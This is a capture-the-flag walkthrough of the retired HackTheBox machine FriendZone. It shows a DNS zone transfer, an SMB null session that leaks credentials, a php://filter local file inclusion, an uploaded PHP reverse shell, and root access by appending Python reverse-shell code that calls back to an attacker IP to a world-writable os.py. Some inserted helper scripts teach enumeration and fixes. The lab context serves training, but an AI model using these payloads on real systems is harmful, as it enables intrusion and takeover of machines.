FriendZone HackTheBox WalkThrough
This is the FriendZone HackTheBox machine walkthrough and also the 25th machine of our OSCP-like HTB Boxes series. In this writeup I have demonstrated step by step how I rooted the FriendZone HackTheBox machine. But before diving into the hacking part, let us know something about this box. It is a Linux machine with IP address 10.10.10.123 and difficulty easy, as assigned by its maker.
Since this machine is retired, you will require a VIP subscription at hackthebox.eu to access it. So first of all connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging its IP 10.10.10.123. If all goes well, start hacking.
As usual I started by scanning the machine with Nmap. Scanning gives us an idea of how to proceed: it finds open and closed ports and tells us which services and versions are running on them. I used Nmap for this task and the result is given below:
Scanning
$ sudo nmap -sC -sV -sT -oA nmap/friendzone 10.10.10.123
Nmap found ports 21, 22, 53, 80, 139, 443 and 445 open: vsftpd on port 21, OpenSSH on port 22, DNS on port 53, Apache2 on port 80, SMB on ports 139 and 445, and Apache2 over SSL on port 443. We have a lot of services to enumerate. We will start by searching for exploits matching each software version shown by nmap. Searchsploit (an offline tool to query exploit-db.com) did not find any relevant exploit for the software present. Perhaps all the software was up to date when the machine was released. We will have to find some other attack vector to get into the machine.
Since port 21 is open, anonymous login is the first thing everyone should check after scanning the machine. I tried logging in with anonymous : anonymous, but anonymous login is not allowed. Moving on to port 22, we will test SSH login once we get some credentials. Since no credentials are available yet, I moved on to enumerating ports 80 and 443.
URL http://10.10.10.123/ revealed an email address ([email protected]) whose domain part is friendzoneportal.red. Also the nmap script ssl-cert revealed the domain friendzone.red from the certificate on port 443. There is also the usual HTB convention friendzone.htb, which I add as well. If name-based virtual hosting is enabled, each name may serve a different website to enumerate. So right now we have three domains; let us add them to our hosts file, which is located in the /etc/ directory, all pointing to 10.10.10.123.
Host File after Modification
$ cat /etc/hosts
http://friendzone.red, http://friendzoneportal.red and http://friendzone.htb all serve the same page as http://10.10.10.123, while the https names differ:
https://friendzone.htb/ — Not found
https://friendzoneportal.red/ — Watching you image
https://friendzone.red/ — Ready to escape from FriendZone
We have a DNS service running on port 53 and we also have three domain names, so let us check whether a DNS zone transfer (AXFR) is possible. A zone transfer should only be permitted to a zone's own secondary nameservers; a server that answers AXFR for anyone hands out every record in the zone, which is exactly the subdomain list we want. When I tried it, the server allowed me to transfer both zones to my local machine.
Performing DNS Zone Transfer
$ dig @10.10.10.123 friendzoneportal.red axfr
$ dig @10.10.10.123 friendzone.red axfr
The DNS zone transfer found some more names: admin.friendzoneportal.red, files.friendzoneportal.red, imports.friendzoneportal.red, vpn.friendzoneportal.red, administrator1.friendzone.red, hr.friendzone.red and uploads.friendzone.red. That gives us 14 new URLs to check, 7 over http and 7 over https. Before accessing them, let us add the names to the hosts file in the /etc/ directory.
Host File after Modification
$ cat /etc/hosts
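Maintaining the hosts file by hand gets tedious once a zone transfer hands back a dozen names, so here is a small added example (not part of the original walkthrough) that parses the text dig prints after an AXFR, keeps the A records, groups the names by address and emits ready-to-append /etc/hosts lines plus the http/https URL list to visit. The sample transfer embedded below is constructed for the example: the names are the ones found above, but the TTLs, the addresses and the DiG header are assumptions, not the real zone contents of 10.10.10.123.

```python
"""Turn `dig @server zone axfr` output into /etc/hosts entries and a URL list.

Added example for this walkthrough, not code from the original page. It parses
the record lines dig prints after a successful zone transfer, keeps only A
records, groups owner names by address and renders hosts-file lines.
"""
from collections import defaultdict

# Constructed sample of what `dig @10.10.10.123 friendzone.red axfr` prints.
# Names come from the walkthrough; TTLs and addresses are assumptions.
SAMPLE_AXFR = """
; <<>> DiG 9.16.1-Ubuntu <<>> @10.10.10.123 friendzone.red axfr
;; global options: +cmd
friendzone.red.                604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                604800  IN  AAAA  ::1
friendzone.red.                604800  IN  NS    localhost.
friendzone.red.                604800  IN  A     10.10.10.123
administrator1.friendzone.red. 604800  IN  A     10.10.10.123
hr.friendzone.red.             604800  IN  A     10.10.10.123
uploads.friendzone.red.        604800  IN  A     10.10.10.123
friendzone.red.                604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
"""


def parse_axfr(text):
    """Yield (name, rtype, rdata) for each record line of dig's AXFR output.

    Comment lines (starting with ';'), blank lines and anything that is not
    NAME TTL CLASS TYPE RDATA are skipped; the owner name's trailing dot is
    removed so it can go straight into /etc/hosts.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue
        yield fields[0].rstrip("."), fields[3], " ".join(fields[4:])


def hosts_entries(text):
    """Group A-record owner names by address: {ip: [name, ...]} in order seen."""
    by_ip = defaultdict(list)
    for name, rtype, rdata in parse_axfr(text):
        # Only A records map a name to an IPv4 address; SOA/NS/AAAA are dropped.
        if rtype == "A" and name not in by_ip[rdata]:
            by_ip[rdata].append(name)
    return dict(by_ip)


def hosts_lines(text):
    """Render hosts_entries() as lines ready to append to /etc/hosts."""
    return [f"{ip} {' '.join(names)}" for ip, names in hosts_entries(text).items()]


def urls(text, schemes=("http", "https")):
    """Every scheme/name combination to visit, in a stable order."""
    names = [n for ns in hosts_entries(text).values() for n in ns]
    return [f"{s}://{n}/" for n in names for s in schemes]


if __name__ == "__main__":
    # Real use: `dig @10.10.10.123 friendzone.red axfr > zone.txt`, feed the
    # file to hosts_lines() and append the output to /etc/hosts as root.
    print("\n".join(hosts_lines(SAMPLE_AXFR)))
    print("\n".join(urls(SAMPLE_AXFR)))
```

Run it on the saved output of both dig commands above; anything that is not an A record (the SOA, NS and AAAA lines dig also prints) is ignored, and names that resolve to different addresses end up on separate hosts lines.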
Enumeration on Port 80 & 443
All the http URLs serve the same page and many of the https URLs are dead. I have annotated each URL below.
http://admin.friendzoneportal.red — Same as initial home page
https://admin.friendzoneportal.red — login-page
http://files.friendzoneportal.red — Same as initial home page
https://files.friendzoneportal.red — Not Found
http://imports.friendzoneportal.red — Same as initial home page
https://imports.friendzoneportal.red — Not Found
http://vpn.friendzoneportal.red — Same as initial home page
https://vpn.friendzoneportal.red — Not Found
http://administrator1.friendzone.red — Same as initial home page
https://administrator1.friendzone.red — Admin Login Page
http://hr.friendzone.red — Same as initial home page
https://hr.friendzone.red — Not Found
http://uploads.friendzone.red — Same as initial home page
https://uploads.friendzone.red — File Upload Options
All the http URLs are useless for now because they all serve the same page; we will come back to them if the https URLs yield nothing interesting. For now we will focus on https://admin.friendzoneportal.red and https://administrator1.friendzone.red, because they have login pages against which we can test a lot of vulnerabilities, and on https://uploads.friendzone.red to test for a file upload vulnerability. Moving on to https://admin.friendzoneportal.red first.
When I tried to log in with any credentials it returned the message “Admin page is not developed yet!!! check for another one”. This line hints that another admin login page exists.
Going to https://administrator1.friendzone.red I found another admin login page. I tried some basic injection like SQL injection and others, but nothing worked. We need valid credentials to log in, so we will return to this page when we have some.
For now let us go to https://uploads.friendzone.red to see what is present. File upload is allowed through it, and there is no restriction: we can even upload a webshell. The problem is that we cannot reach our uploaded files afterwards. For that we need a directory listing or an LFI-type vulnerability, and so far we have neither.
Enumeration on Port 445
We have port 445 open, so let us check whether a null session is allowed.
$ smbmap -H 10.10.10.123 -R --depth 5
A null session is allowed and we have read access to a file creds.txt inside the \general\ share. Let us download it using smbclient.
$ smbclient //10.10.10.123/general
smb: > get creds.txt
smb: > exit
$ cat creds.txt
creds.txt contains the credentials of user admin: admin : WORKWORKHhallelujah@#
After logging in with these credentials at https://administrator1.friendzone.red/login.php, the page told me to visit /dashboard.php.
Going to https://administrator1.friendzone.red/dashboard.php listed some parameters: image_id=a.jpg&pagename=timestamp. Next I tried to reach my uploaded file using the timestamp I got after the successful upload, but it gave an error.
After spending some more time enumerating this URL I found an LFI vulnerability in the pagename parameter, which can be confirmed with the URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login. Note that the resource is named login, not login.php: the script appends the .php extension itself before including the file. The php://filter wrapper base64-encodes the file instead of executing it, so we get the source code of the login page from the above URL.
$ echo -n "<base64 string returned by the page>" | base64 -d
After a lot of enumeration I still could not find my uploaded webshell. From the output of the earlier $ smbmap -H 10.10.10.123 -R --depth 5 command we learned that the Samba server files are stored in the directory /etc/Files/ and that the anonymous user also has write permission on the Development share.
So according to that output the on-disk path of our upload should be /etc/Files/Development/shell, but after uploading the shell to the Development share through smbclient it turned out to be accessible at /etc/Development/shell. Presumably the admin changed the share's path from the default. The uploaded shell can be executed at URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell. The .php extension is left off in the URL because dashboard.php appends it to whatever pagename is given; the file on disk is still shell.php.
Testing For File Upload
Let us upload a simple php script to check whether we can execute it or not.
$ echo "<?php echo \"This is test php file\" ?>" > test.php
$ cat test.php
$ smbclient //10.10.10.123/Development
smb: \> put test.php
smb: \> exit
The uploaded file can be accessed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
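To make the mechanics of this step explicit, here is an added example (not code from the original walkthrough, and not the box's own dashboard.php, which is not reproduced here) that models the behaviour observed above: the value of pagename gets ".php" appended and is then included with no restriction. It builds the php://filter URL, pulls the base64-encoded source back out of a response, models how a plain name, an absolute path and a wrapper are resolved by such an include, and shows the allow-list check that would have blocked both the source disclosure and the webshell. The web root /var/www/admin/, the ALLOWED_PAGES set and the stand-in login.php source are assumptions made for the example.

```python
"""Model of an include($_GET['pagename'] . '.php') LFI and the php://filter read.

Added example for this walkthrough; it is not the box's dashboard.php. The
include behaviour is modelled from what the walkthrough observes, and the
web root, page allow-list and sample source are assumptions.
"""
import base64
import re

BASE = "https://administrator1.friendzone.red/dashboard.php"
FILTER = "php://filter/convert.base64-encode/resource="
WEBROOT = "/var/www/admin/"                         # assumption
ALLOWED_PAGES = {"login", "dashboard", "timestamp"}  # assumption

# Constructed stand-in for what login.php might look like; not the real file.
SAMPLE_SOURCE = "<?php\n// constructed sample, not the box's login.php\necho 'login';\n"


def filter_url(page, image_id="a.jpg"):
    """URL that makes the include return a page's PHP source base64-encoded.

    `page` is given without .php because the script appends the suffix itself
    (resource=login, not resource=login.php).
    """
    return f"{BASE}?image_id={image_id}&pagename={FILTER}{page}"


def decode_filter_response(body):
    """Find the base64 blob in a response body and decode it to PHP source.

    Returns None when nothing in the body decodes to text starting with
    '<?php', which is the quick check that the filter trick actually worked
    rather than the file being executed or not found.
    """
    for blob in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body):
        try:
            src = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        if src.lstrip().startswith("<?php"):
            return src
    return None


def fake_response(src):
    """Constructed HTML page wrapping the encoded source, as the filter returns it."""
    return "<html><body>" + base64.b64encode(src.encode()).decode() + "</body></html>"


def resolve_include(pagename):
    """Model include($_GET['pagename'] . '.php') from the vulnerable script.

    A plain name resolves under the web root, an absolute path escapes it,
    and a php:// wrapper is handed to PHP's stream layer. This is why the
    webshell is uploaded as shell.php but referenced as /etc/Development/shell.
    """
    target = pagename + ".php"
    if target.startswith("php://"):
        return ("wrapper", target)
    if target.startswith("/"):
        return ("absolute", target)
    return ("webroot", WEBROOT + target)


def harden_pagename(pagename):
    """What the script should have done: allow-list, never path-join user input."""
    if pagename not in ALLOWED_PAGES:
        raise ValueError(f"rejected pagename: {pagename!r}")
    return resolve_include(pagename)


if __name__ == "__main__":
    print(filter_url("login"))
    print(resolve_include("/etc/Development/shell"))
    print(decode_filter_response(fake_response(SAMPLE_SOURCE)))
```

The allow-list in harden_pagename is the fix that matters: stripping "../" or blocking "php://" by pattern leaves other wrappers and absolute paths open, whereas mapping a fixed set of names to files never lets the request choose a path at all.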
Getting User Shell
Now that we have confirmed we can execute uploaded PHP, let us upload a reverse shell to get a user shell back on our Kali machine.
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php
$ vi shell.php
# change to your tun0 IP
$ cat shell.php | grep -A8 -i 10.10.14.12
$ smbclient //10.10.10.123/Development
smb: \>put shell.php
smb: \> exit
Access this URL to execute the shell: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell. But before accessing it, start a netcat listener in your terminal.
$ nc -nvlp 1234
$ whoami && id
We have got a user shell. Let us upgrade it to a fully interactive TTY so that we can run more advanced Linux commands through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
After some enumeration I found a file mysql_data.conf in the directory /var/www/ which contains credentials for user friend that also work for SSH.
$ cat /var/www/mysql_data.conf
The credentials are friend : Agpyu12!0.213$
Let us log in as user friend and capture the user flag.
SSH into User Friend
$ ssh friend@10.10.10.123
# password: Agpyu12!0.213$
$ whoami && id
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector. You can run an enumeration script such as LinPEAS or LinEnum for this, or enumerate manually. I tried LinPEAS but it did not find the PrivEsc vector, so I had to enumerate manually.
Finding PrivEsc Vector
After some enumeration I found a file reporter.py inside the directory /opt/server_admin/.
$ cat /opt/server_admin/reporter.py
Meanwhile, I ran pspy (a process monitoring tool) to monitor the processes running on the remote machine. It reported that reporter.py is executed by root every 2 minutes. If we had write permission on this file we could simply put a reverse shell in it and get a root shell, but our user has no write permission on it, as the ls -la output below shows.
One thing to note in the above script is that it imports the os module. When Python imports a module it executes that module's code, so if we can write to os.py our reverse shell code will run with root permissions every time reporter.py is executed, and we will get a reverse shell on our netcat listener.
$ ls -la /opt/server_admin/reporter.py
Let us check the permission of os.py.
$ locate os.py
$ ls -la /usr/lib/python2.7/os.py
os.py is writable by every user, not just root. So here we can make our reverse shell code be executed by root by appending it to os.py. When I did this I got a reverse shell with root privileges very easily. So our PrivEsc vector is Privilege Escalation using Python Library Hijacking. For more info on Python library hijacking check this blog, and see an HTB box writeup with the same privilege escalation vector here.
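The manual check above (which modules does the root-run script import, and which of them can I write to?) generalises, so here is an added example, not part of the original walkthrough, that automates it. Given the source of a script root runs, it lists the top-level modules it imports, resolves each against the interpreter's search path in order, and reports the two conditions a low-privileged user can exploit: a module file that is writable (os.py on this box) and a writable search-path directory that is searched before the directory the module really lives in, where a shadow copy of the module would win. Filesystem access is injected so the same function runs against the constructed layout in demo(); on a real target you pass os.path.exists and a check such as lambda p: os.access(p, os.W_OK), and sys.path as seen by the interpreter root uses. The reporter.py stand-in in demo() is constructed and only keeps the import os the walkthrough mentions; the search path, the file list and the sys.py entry are assumptions.

```python
"""Find imports of a root-run script that an unprivileged user can hijack.

Added example for this walkthrough; not the box's reporter.py and not a
reproduction of pspy or LinPEAS output. Search paths and the constructed
layout in demo() are assumptions made for the example.
"""
import ast
import posixpath


def imported_modules(source):
    """Top-level module names imported by `source` (import x; from x.y import z).

    Relative imports (from . import x) are skipped: they resolve inside the
    script's own package, not through the search path.
    """
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def find_hijackable(source, search_path, exists, writable):
    """Return {module: [finding, ...]} for each import that can be hijacked.

    search_path is the interpreter's sys.path in order; entry 0 is the
    directory of the script itself, which Python always searches first.
    exists(path) and writable(path) are injected so the logic can run on a
    constructed layout as well as on a live filesystem.
    """
    findings = {}
    for mod in imported_modules(source):
        hits = []
        for d in search_path:
            candidate = posixpath.join(d, mod + ".py")
            pkg = posixpath.join(d, mod, "__init__.py")
            if exists(candidate) or exists(pkg):
                real = candidate if exists(candidate) else pkg
                # The module itself is writable: append code, as with os.py here.
                if writable(real):
                    hits.append(f"writable module file {real}")
                break
            # No module here yet, but the directory is writable and is searched
            # earlier than the real location: a shadow copy dropped here wins.
            if writable(d):
                hits.append(f"writable search-path dir {d} precedes real {mod}")
        if hits:
            findings[mod] = hits
    return findings


def demo():
    """Constructed layout mirroring the box: os.py world-writable, nothing else."""
    # Constructed reporter.py stand-in; the real file's body is not reproduced.
    source = "#!/usr/bin/python\nimport os\n"
    files = {"/usr/lib/python2.7/os.py": True}        # writable by everyone
    dirs = {"/opt/server_admin": False, "/usr/lib/python2.7": False}
    exists = lambda p: p in files or p in dirs
    writable = lambda p: files.get(p, dirs.get(p, False))
    # Script directory first, then the stdlib directory: an assumed sys.path.
    return find_hijackable(source, ["/opt/server_admin", "/usr/lib/python2.7"],
                           exists, writable)


if __name__ == "__main__":
    for mod, hits in demo().items():
        print(mod, "->", "; ".join(hits))
```

On a target the script directory (/opt/server_admin here) is the first place to check: if it were writable, a file named os.py dropped next to reporter.py would be imported instead of the real module, which is the shadowing case the second finding reports.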
Getting Root Shell
To get a root shell, start a netcat listener in one window and append the following reverse shell code to the end of os.py, changing the IP to your tun0 address, then save it. After that wait up to 2 minutes for the shell. dup2 is already defined in os.py's own namespace (it comes from the posix module), which is why no os. prefix is needed.
import pty
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.7", 9001))   # your tun0 IP and listener port
dup2(s.fileno(), 0)   # bare dup2: we are inside os.py, so it is already in scope
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
s.close()
$ nano /usr/lib/python2.7/os.py
$ tail -13 /usr/lib/python2.7/os.py
$ nc -nvlp 9001
# whoami && id
We have got a root shell. Let us capture the root flag.
Capture Root Flag
$ cat root.txt
This was how I rooted the FriendZone HackTheBox machine. I learnt a lot during this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the writeup feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.